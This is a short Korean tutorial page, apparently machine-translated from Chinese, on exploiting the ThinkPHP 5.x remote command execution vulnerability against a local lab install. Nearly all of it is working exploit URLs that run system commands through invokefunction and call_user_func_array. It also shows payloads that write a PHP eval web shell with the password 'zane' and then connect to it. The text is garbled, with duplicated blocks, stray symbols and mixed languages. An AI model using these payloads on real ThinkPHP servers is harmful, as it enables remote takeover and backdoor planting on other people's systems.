다음은 thinkphp프레임워크 튜토리얼 칼럼의 ThinkPHP 취약점 공격에 대한 소개입니다. 도움이 필요한 친구들에게 도움이 되길 바랍니다!
thinkphp_5x_command 실행 취약점
영향을 받는 버전에는 버전 5.0 및 5.1
docker 취약점 환경 소스 코드가 포함됩니다: https://github.com/vulnspy/thinkphp-5.1<code>https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
EXPhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
로컬 환경 설정:
http://www.thinkphp.cn/donate/download/id/1125.html
EXPhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/ thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
🎜 🎜쓰기 to shell🎜http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>🎜식칼을 사용하여 연결🎜`🎜http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 비밀번호는 zane🎜🎜http://127.0.0.1/middleware/ thinkphp_5.0.15_full/test.php 비밀번호는 zane🎜`🎜
위 내용은 ThinkPHP 취약점 악용 정보의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!